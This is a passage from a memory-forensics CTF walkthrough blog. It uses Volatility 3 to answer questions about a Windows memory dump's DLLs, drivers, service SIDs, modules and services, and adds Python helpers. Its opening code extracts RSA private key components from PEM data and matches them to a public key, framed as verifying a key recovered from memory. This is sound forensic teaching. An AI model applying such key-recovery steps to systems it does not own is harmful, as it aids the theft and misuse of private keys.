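    """Read one DER tag/length/value at pos; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long form: low 7 bits = number of length bytes
        count = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + count], "big"), pos + count
    return tag, buf[pos:pos + length], pos + length


def der_children(seq_value: bytes):
    """Split the value of a SEQUENCE into its (tag, value) children."""
    children, pos = [], 0
    while pos < len(seq_value):
        tag, value, pos = der_read(seq_value, pos)
        children.append((tag, value))
    return children


def rsa_private_components(pem: str) -> dict:
    """PKCS#1 RSAPrivateKey ::= SEQUENCE { version, n, e, d, p, q, dP, dQ, qInv }."""
    tag, body, _ = der_read(pem_to_der(pem))
    if tag != 0x30:
        raise ValueError("expected a SEQUENCE")
    ints = [int.from_bytes(v, "big") for t, v in der_children(body) if t == 0x02]
    _version, n, e, d, p, q = ints[:6]
    return {"n": n, "e": e, "d": d, "p": p, "q": q}


def spki_public_components(pem: str) -> dict:
    """X.509 SubjectPublicKeyInfo ::= SEQUENCE { AlgorithmIdentifier, BIT STRING { RSAPublicKey } }."""
    tag, body, _ = der_read(pem_to_der(pem))
    if tag != 0x30:
        raise ValueError("expected a SEQUENCE")
    _alg, (bits_tag, bits) = der_children(body)
    if bits_tag != 0x03 or bits[0] != 0:
        raise ValueError("expected a BIT STRING with no unused bits")
    _, rsa_body, _ = der_read(bits[1:])      # RSAPublicKey ::= SEQUENCE { n, e }
    n, e = [int.from_bytes(v, "big") for _t, v in der_children(rsa_body)]
    return {"n": n, "e": e}


def private_key_is_consistent(priv: dict) -> bool:
    """n must equal p*q, and d must invert e modulo (p-1) and (q-1)."""
    ed = priv["e"] * priv["d"]
    return priv["n"] == priv["p"] * priv["q"] and ed % (priv["p"] - 1) == 1 and ed % (priv["q"] - 1) == 1


def key_pair_matches(priv_pem: str, pub_pem: str) -> bool:
    """True when the recovered private key and the public key are the same RSA key."""
    priv, pub = rsa_private_components(priv_pem), spki_public_components(pub_pem)
    return private_key_is_consistent(priv) and (priv["n"], priv["e"]) == (pub["n"], pub["e"])


def textbook_rsa_roundtrip(message: bytes, priv_pem: str, pub_pem: str) -> bytes:
    """Raw, unpadded RSA: encrypt with the public key, decrypt with the private key.
    Demonstration only; real use needs PKCS#1 v1.5 or OAEP padding, which openssl pkeyutl adds."""
    priv, pub = rsa_private_components(priv_pem), spki_public_components(pub_pem)
    m = int.from_bytes(message, "big")
    if m >= pub["n"]:
        raise ValueError("message too long for raw RSA with this modulus")
    c = pow(m, pub["e"], pub["n"])
    return pow(c, priv["d"], priv["n"]).to_bytes(len(message), "big")
```

The modulus comparison is the check to reach for on a real incident: a key recovered from a memory image is confirmed to belong to the certificate a server presents by comparing moduli (or `openssl x509 -modulus` against `openssl rsa -modulus`), without ever having to use the key. The certificate printout above also shows a 1024-bit key, a sha1WithRSAEncryption signature and a validity period that ended in 2019; any one of those would be rejected by a current TLS client, so the same recovered material also documents a weak server configuration.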
</pre><div><br /></div></div></div><div><br /></div><div>Hopefully, this helped you to understand how someone might have been able to steal a key from memory and then perform malicious actions, as was done at Microsoft.</div><div><br /></div><div>Moving on!</div><div><br /></div><div>Looking at the DLLs for the HTTPD process.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp</span><b><span style="color: #fcff01;"> windows.dlllist.DllList --pid 10008 > httpd_dlllist.tx</span></b><span style="color: white;">t
Progress: 100.00 PDB scanning finished</span></pre></div></div><div><br /></div><div><b>Q:</b> What path is the httpd image file/executable loaded from?</div><div><b>A:</b> Image is loaded from "<i>c:\xampp\apache\bin\httpd.exe</i>"</div></div></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">head httpd_dlllist.txt --lines=5
Volatility 3 Framework 2.5.2
PID Process Base Size Name Path LoadTime File output
10008 </span><b><span style="color: #fcff01;"> httpd.exe </span></b><span style="color: white;"> 0x7ff69ef60000 0xc000 httpd.exe </span><span style="color: #fcff01;"><b>c:\xampp\apache\bin\httpd.exe</b></span><span style="color: white;"> 2023-11-16 23:26:15.000000 Disabled</span>
</pre></div></div><div><br /></div><div>Looking at the driver list.</div><div><br /></div><div>Here is a subset:</div></div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat drivers_scan.txt | head --lines=10
Volatility 3 Framework 2.5.2
Offset Start Size Service Key Driver Name Name
0xb9841ee78464 0x690064004e 0x610057 N/A N/A N/A
0xb9841ee78464 0x690064004e 0x610057 N/A N/A N/A
0xb9841ee8f31c 0x939800249370 0x249420 N/A N/A N/A
0xb9841ee8f31c 0x939800249370 0x249420 N/A N/A N/A
0xe78befeb8c20 0xf8021f400000 0x0 \Driver\ACPI_HAL ACPI_HAL \Driver\ACPI_HAL
0xe78befeb8e30 0xf8021f400000 0x0 \Driver\WMIxWDM WMIxWDM \Driver\WMIxWDM
.......</span>
</pre></div></div><div><br /></div><div><b>Q:</b> How many unique device driver "Name" entries do we have listed, including the full path and ignoring any "N/A" and non-ASCII entries?</div><div><b>A:</b> 155</div></div><div><br /></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat drivers_scan.txt | awk --field-separator=' ' '{ print $6 }'| sort --unique | sed '1,2d' | head --lines=-3 | wc --lines
155</span>
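The awk/sort/sed pipeline above relies on the header being the first two sorted lines and the junk sitting at the end. As an added example that is not part of the original post, here is the same count with each filter stated explicitly: skip the Volatility banner and column header, take the sixth whitespace-separated column (the "Name" path), and drop "N/A" and any non-ASCII value. The sample rows are copied from the subset above; the final row with accented characters is constructed for this example to exercise the non-ASCII filter and does not appear in the real listing.

```python
# Constructed sample in the layout of the driver listing above. The first
# seven data rows are from the page; the last row is made up to exercise
# the non-ASCII filter.
SAMPLE_DRIVERSCAN = """\
Volatility 3 Framework 2.5.2
Offset Start Size Service Key Driver Name Name
0xb9841ee78464 0x690064004e 0x610057 N/A N/A N/A
0xb9841ee78464 0x690064004e 0x610057 N/A N/A N/A
0xb9841ee8f31c 0x939800249370 0x249420 N/A N/A N/A
0xb9841ee8f31c 0x939800249370 0x249420 N/A N/A N/A
0xe78befeb8c20 0xf8021f400000 0x0 \\Driver\\ACPI_HAL ACPI_HAL \\Driver\\ACPI_HAL
0xe78befeb8e30 0xf8021f400000 0x0 \\Driver\\WMIxWDM WMIxWDM \\Driver\\WMIxWDM
0xe78befeb8e30 0xf8021f400000 0x0 \\Driver\\WMIxWDM WMIxWDM \\Driver\\WMIxWDM
0xb9841ee9a000 0x0 0x0 N/A \u00e9\u00e9 \\Driver\\\u00e9\u00e9
"""

# Columns: Offset, Start, Size, Service Key, Driver Name, Name -> "Name" is zero-based index 5,
# which is awk's $6 in the pipeline above.
NAME_COLUMN = 5


def unique_driver_names(listing: str) -> list:
    """Distinct values of the Name column, skipping banner/header rows, N/A and non-ASCII names."""
    names = set()
    for line in listing.splitlines():
        if line.startswith(("Volatility", "Offset")):   # banner and column header
            continue
        fields = line.split()
        if len(fields) <= NAME_COLUMN:                   # truncated or blank row
            continue
        name = fields[NAME_COLUMN]
        if name == "N/A" or not name.isascii():          # placeholder or carved garbage
            continue
        names.add(name)
    return sorted(names)


def count_unique_driver_names(listing: str) -> int:
    return len(unique_driver_names(listing))
```

Run `count_unique_driver_names(open("drivers_scan.txt").read())` on the real output to reproduce the figure above; because every filter is explicit, the count no longer depends on where `sort` happens to place the header or the non-ASCII rows.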
</pre></div></div><div><br /></div><div>Looking at the service SIDs.</div></div><div><br /></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><span style="color: #fcff01;"><b>windows.getservicesids.GetServiceSIDs > service_sids.txt</b></span><span style="color: white;">
Progress: 100.00 PDB scanning finished</span>
</pre><div><br /></div></div></div><div><br /></div><div>Earlier, at the beginning, we identified the tool used to perform this memory capture. This tool was installed as a service. </div><div><br /></div><div><b>Q:</b> What is the service SID associated with this tool/software?</div><div><b>A:</b> S-1-5-80-799667949-3218159461-2708755627-866028366-136143606 DumpIt</div><div><br /></div><div><b>Q:</b> When analyzing the PowerShell history, there was a search for an executable via the "<i>dir</i>" command. What is the device driver used by this software for "packet capture (and sending) library"?</div><div><b>A:</b> S-1-5-80-1676788727-3510623216-988961428-862518577-4183329668 npcap</div><div>S-1-5-80-3864102162-464399774-2857244265-230461771-3046054788 npcap_wifi</div><div><br /></div><div><b>Q:</b> What is/are the service SID(s) associated with the SSH we learned about earlier?</div><div><b>A:</b> S-1-5-80-3847866527-469524349-687026318-516638107-1125189541 sshd</div><div><br /></div><div>All answers can be found here:</div></div><div><br /></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat service_sids.txt | grep --perl-regexp --ignore-case 'DumpIt|npcap|ssh'
S-1-5-80-799667949-3218159461-2708755627-866028366-136143606 DumpIt
S-1-5-80-1676788727-3510623216-988961428-862518577-4183329668 npcap
S-1-5-80-3864102162-464399774-2857244265-230461771-3046054788 npcap_wifi
S-1-5-80-2277354432-2697620045-1656008878-1855416240-261295475 ssh-agent
S-1-5-80-3847866527-469524349-687026318-516638107-1125189541 sshd</span>
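</pre></div></div><div><br /></div><div>Because a service SID is derived from its name, the SIDs above can be recomputed and checked rather than taken on trust. The Python below is an added example, not code from the original post or from Volatility: it implements the derivation (SHA-1 over the upper-cased UTF-16LE service name, split into five little-endian 32-bit sub-authorities) and checks the rows from the grep output above against it. A row that fails the check carries a SID that does not belong to the name next to it.</div><div><br /></div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px; color: white;">
```python
"""Recompute Windows service SIDs (S-1-5-80-...) from service names.

Added example, not part of the original post. The SIDs that
windows.getservicesids prints are not stored on disk: Windows derives a
service SID as SHA-1 over the upper-cased UTF-16LE service name, split into
five little-endian 32-bit sub-authorities (the same value sc.exe showsid
prints). Recomputing them lets an analyst confirm that a SID seen in a token
or an ACL really belongs to the service name it is labelled with.
"""
import hashlib


def service_sid(service_name):
    """Return the service SID for a service name such as 'sshd'."""
    digest = hashlib.sha1(service_name.upper().encode("utf-16-le")).digest()
    sub_authorities = [int.from_bytes(digest[i:i + 4], "little") for i in range(0, 20, 4)]
    return "S-1-5-80-" + "-".join(str(sa) for sa in sub_authorities)


def check_service_sids(lines):
    """Check 'SID Name' rows as emitted by windows.getservicesids.

    Returns {name: True/False}: True when the listed SID matches the recomputed
    one. A mismatch means the SID does not belong to that name (typo, tampering,
    or a different service with a similar name).
    """
    results = {}
    for line in lines:
        parts = line.split()
        if len(parts) != 2 or not parts[0].startswith("S-1-5-80-"):
            continue  # banner, header and non-service-SID rows
        sid, name = parts
        results[name] = service_sid(name) == sid
    return results


# Sample rows copied from the service_sids.txt grep output on this page.
SAMPLE_GETSERVICESIDS = """\
S-1-5-80-799667949-3218159461-2708755627-866028366-136143606 DumpIt
S-1-5-80-1676788727-3510623216-988961428-862518577-4183329668 npcap
S-1-5-80-3864102162-464399774-2857244265-230461771-3046054788 npcap_wifi
S-1-5-80-2277354432-2697620045-1656008878-1855416240-261295475 ssh-agent
S-1-5-80-3847866527-469524349-687026318-516638107-1125189541 sshd
""".splitlines()

if __name__ == "__main__":
    for name, ok in check_service_sids(SAMPLE_GETSERVICESIDS).items():
        print("%-12s %s %s" % (name, "matches " if ok else "MISMATCH", service_sid(name)))
```
</pre></div></div><div><br /></div><div>Run it against the full service_sids.txt and every row should report "matches"; the same function also turns an unlabelled S-1-5-80 SID found in an ACL or a token back into a service name by hashing candidate names until one matches.</div><div><br /></div><div><div><pre>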
</pre></div></div><div><br /></div><div><b>Q:</b> What is the path of the file associated with each of these drivers?</div><div><div><br /></div></div><div>First, aggregate all the kernel modules. modscan carves module objects out of memory rather than walking the kernel's loaded-module list, so it also finds entries that have been unlinked from that list.</div></div><div><br /></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><span style="color: #fcff01;"><b>windows.modscan.ModScan > modscan.txt</b></span><span style="color: white;">
Progress: 100.00 PDB scanning finished</span>
</pre></div></div><div><br /></div><div><b>A:</b> Nothing comes back for ssh, and that is expected: sshd is a user-mode service (svcscan later reports it as SERVICE_WIN32_OWN_PROCESS), not a kernel module, so modscan will never list it. The two drivers are returned with their paths:</div><div><br /></div></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">grep --perl-regexp --ignore-case 'DumpIt|npcap|ssh' modscan.txt
0xe78bf0831710 0xf802266b0000 0x13000 npcap.sys \SystemRoot\system32\DRIVERS\npcap.sys Disabled
0xe78bf49f58e0 0xf802469f0000 0x14000 DumpIt.sys \??\C:\Windows\system32\Drivers\DumpIt.sys Disabled</span>
</pre><div><br /></div></div></div><div><br /></div><div>Alternatively, the same two entries are in modules.txt, the windows.modules output from earlier. That plugin walks the kernel's loaded-module list, whereas modscan carves module objects from memory, so the two agreeing is a useful cross-check:</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">grep --perl-regexp --ignore-case 'DumpIt|npcap|ssh' modules.txt
0xe78bf0831710 0xf802266b0000 0x13000 npcap.sys \SystemRoot\system32\DRIVERS\npcap.sys Disabled
0xe78bf49f58e0 0xf802469f0000 0x14000 DumpIt.sys \??\C:\Windows\system32\Drivers\DumpIt.sys Disabled</span>
</pre><div><br /></div></div></div><div><br /></div></div></div><div><div>Still with the tool used to get this memory capture.</div><div><br /></div><div><b>Q:</b> Where was the memory capturing tool launched from?</div><div><b>A:</b> <i>"\TOOLS\DumpIt.exe"<br /><br /></i></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.ldrmodules.LdrModules --pid 5652</span></b><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Pid Process Base InLoad InInit InMem MappedPath
...
5652 DumpIt.exe 0x7ff7da2c0000 True False True \TOOLS\DumpIt.exe</span>
</pre></div></div><div><br /></div></div><div>Alternatively, we could have written the same plugin output to a file, which also answers the next question.</div></div><div><div><b>Q:</b> How many modules were loaded by this tool?</div></div><div><b>A:</b> ldrmodules lists 39 entries for DumpIt.exe (PID 5652) once the banner and header lines are stripped. That count is the executable itself plus every DLL mapped into the process. The main executable normally shows InInit False, as DumpIt.exe does above; a DLL that is False in all three lists is the pattern injected or unlinked code leaves behind.<br /><br /><div>Write the information out to a file: </div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><span style="color: #fcff01;"><b>windows.ldrmodules.LdrModules --pid 5652 > 5652_dumpit.txt</b></span><span style="color: white;">
Progress: 100.00 PDB scanning finished
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat 5652_dumpit.txt | sed '1,4d' | wc --lines
39</span>
</pre></div></div><div><br /></div><div>Revisiting persistence. Looking at the services on the system.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp</span><span style="color: #fcff01;"><b> windows.svcscan > svcscan.txt</b></span><span style="color: white;">
Progress: 100.00 PDB scanning finished</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> How many services were on this system at the time of the capture?</div><div><b>A:</b> svcscan returns 825 service records. That figure counts every record carved from the memory of services.exe, so it includes kernel and file-system drivers alongside Win32 services, and it can contain more than one record for the same service (sshd shows up twice further down):</div></div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$</span><span style="color: white;">cat svcscan.txt | sed '1,4d' | wc --lines
825</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> What are their different service states and their counts?</div><div><b>A:</b> Below shows the two states and their counts.<br /></div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$c</span><span style="color: white;">at svcscan.txt | awk --field-separator=' ' '{ print $5 }' | sort | uniq --count | sort | tail --lines=2
361 SERVICE_RUNNING
464 SERVICE_STOPPED</span></pre></div></div><div><br /></div></div><div><div><b>Q:</b> What are the different service "start" modes and their counts?</div><div><b>A:</b> </div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat svcscan.txt | awk --field-separator=' ' '{ print $4 }' | sort | uniq --count | sort --numeric-sort --reverse
566 SERVICE_DEMAND_START
165 SERVICE_AUTO_START
47 SERVICE_BOOT_START
32 SERVICE_SYSTEM_START
15 SERVICE_DISABLED</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> What are the different service types on the system and their counts?</div><div><b>A:</b> Shown below. The "3" row with no value and the "1 Type" row are the banner, blank and header lines of svcscan.txt, which this pipeline does not strip (the earlier ones used sed '1,4d'); the remaining seven rows add up to the 825 records.</div><div>Different Service "<i>Type</i>"</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat svcscan.txt | awk --field-separator=' ' '{ print $6 }' | sort | uniq --count | sort --numeric-sort --reverse
352 SERVICE_KERNEL_DRIVER
180 SERVICE_WIN32_SHARE_PROCESS
150 SERVICE_WIN32_OWN_PROCESS|SERVICE_WIN32_SHARE_PROCESS
100 SERVICE_WIN32_OWN_PROCESS
40 SERVICE_FILE_SYSTEM_DRIVER
3
2 SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS
1 Type
1 SERVICE_WIN32_SHARE_PROCESS|SERVICE_INTERACTIVE_PROCESS</span>
</pre></div></div><div><br /></div></div><div><div>Previously, you needed to find the driver associated with "capturing and (sending) packets".</div><div><b>Q:</b> How is this driver configured to start, what was its state at the time of capture, what type of driver is it and what memory offset can it be found at?</div><div><br /></div><div><b>A:</b> All four answers sit in the single svcscan record below: start mode SERVICE_SYSTEM_START, state SERVICE_RUNNING, type SERVICE_KERNEL_DRIVER, with the record at offset 0x2152b86a460. The PID column reads N/A because a kernel driver has no process of its own.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat svcscan.txt | grep npcap
0x2152b86a460 328 N/A SERVICE_SYSTEM_START SERVICE_RUNNING SERVICE_KERNEL_DRIVER npcap Npcap Packet Driver (NPCAP)</span>
</pre></div></div><div><br /></div></div><div><div>Similarly to the previous question, we saw the system was listening on port 22 at the time of capture. </div><div><b>Q:</b> What was the <i>servicename</i>, <i>state</i>, <i>start</i>, <i>type </i>and <i>name </i>for the service listening on this port?</div><div><b>A:</b> Service name sshd, state SERVICE_RUNNING, start SERVICE_AUTO_START, type SERVICE_WIN32_OWN_PROCESS, display name "OpenSSH SSH Server". Note that svcscan returns two records for sshd, at offsets 0x2152b887240 and 0x2152b8888f0, both with order number 462. Carving can surface a current record and a stale copy of it, so check that the copies agree before quoting either as the answer.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">grep --ignore-case 'sshd' svcscan.txt
0x2152b887240 462 0 SERVICE_AUTO_START SERVICE_RUNNING SERVICE_WIN32_OWN_PROCESS sshd OpenSSH SSH Server -
0x2152b8888f0 462 0 SERVICE_AUTO_START SERVICE_RUNNING SERVICE_WIN32_OWN_PROCESS sshd OpenSSH SSH Server</span>
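</pre></div></div><div><br /></div><div>The counting pipelines above and the doubled sshd record are both served by the Python below, which is an added example and not code from the original post or from Volatility. It parses svcscan rows with a regular expression, so the banner and header lines that surfaced as the "3" and "Type" rows in the type tally are skipped, and it reports any service name that has more than one record. The banner and header lines in the sample are reconstructed from the plugin's column names; the three data rows are copied from the output above.</div><div><br /></div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px; color: white;">
```python
"""Summarise windows.svcscan output and flag duplicate service records.

Added example, not part of the original post. It replaces the awk/sort/uniq
pipelines with a parser that ignores the Volatility banner, blank and header
lines (the '3' and 'Type' rows in the type tally come from exactly those
lines) and reports names with more than one record, such as the two sshd
records at different offsets that a pool scan returns when a stale copy of
the record is still in memory.
"""
import re
from collections import Counter, defaultdict

# Columns printed by windows.svcscan in Volatility 3 2.5.x:
# Offset Order PID Start State Type Name Display [Binary]
SVCSCAN_ROW = re.compile(
    r"^(?P<offset>0x[0-9a-fA-F]+)\s+(?P<order>\d+)\s+(?P<pid>\S+)\s+"
    r"(?P<start>SERVICE_\S+)\s+(?P<state>SERVICE_\S+)\s+(?P<type>SERVICE_\S+)\s+"
    r"(?P<name>\S+)\s*(?P<display>.*)$"
)


def parse_svcscan(lines):
    """Yield one dict per service record; anything that is not a record is skipped."""
    for line in lines:
        m = SVCSCAN_ROW.match(line.strip())
        if m:
            yield m.groupdict()


def tally(records, column):
    """Count the values of one column (start, state or type), most common first."""
    return Counter(r[column] for r in records).most_common()


def duplicate_names(records):
    """Map each service name seen more than once to the offsets of its records."""
    seen = defaultdict(list)
    for r in records:
        seen[r["name"]].append(r["offset"])
    return {name: offsets for name, offsets in seen.items() if len(offsets) > 1}


# Constructed sample: banner and header mimic a redirected svcscan.txt, the three
# data rows are copied from the grep output on this page.
SAMPLE_SVCSCAN = """\
Volatility 3 Framework 2.5.2

Offset\tOrder\tPID\tStart\tState\tType\tName\tDisplay\tBinary
0x2152b86a460 328 N/A SERVICE_SYSTEM_START SERVICE_RUNNING SERVICE_KERNEL_DRIVER npcap Npcap Packet Driver (NPCAP)
0x2152b887240 462 0 SERVICE_AUTO_START SERVICE_RUNNING SERVICE_WIN32_OWN_PROCESS sshd OpenSSH SSH Server -
0x2152b8888f0 462 0 SERVICE_AUTO_START SERVICE_RUNNING SERVICE_WIN32_OWN_PROCESS sshd OpenSSH SSH Server
""".splitlines()

if __name__ == "__main__":
    recs = list(parse_svcscan(SAMPLE_SVCSCAN))
    print("%d service records" % len(recs))
    for column in ("start", "state", "type"):
        print(column, tally(recs, column))
    print("duplicates:", duplicate_names(recs))
```
</pre></div></div><div><br /></div><div>Point it at the full svcscan.txt and the three tallies come back without the header artefacts, and duplicate_names lists every service that, like sshd here, has more than one record to reconcile.</div><div><br /></div><div><div><pre>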
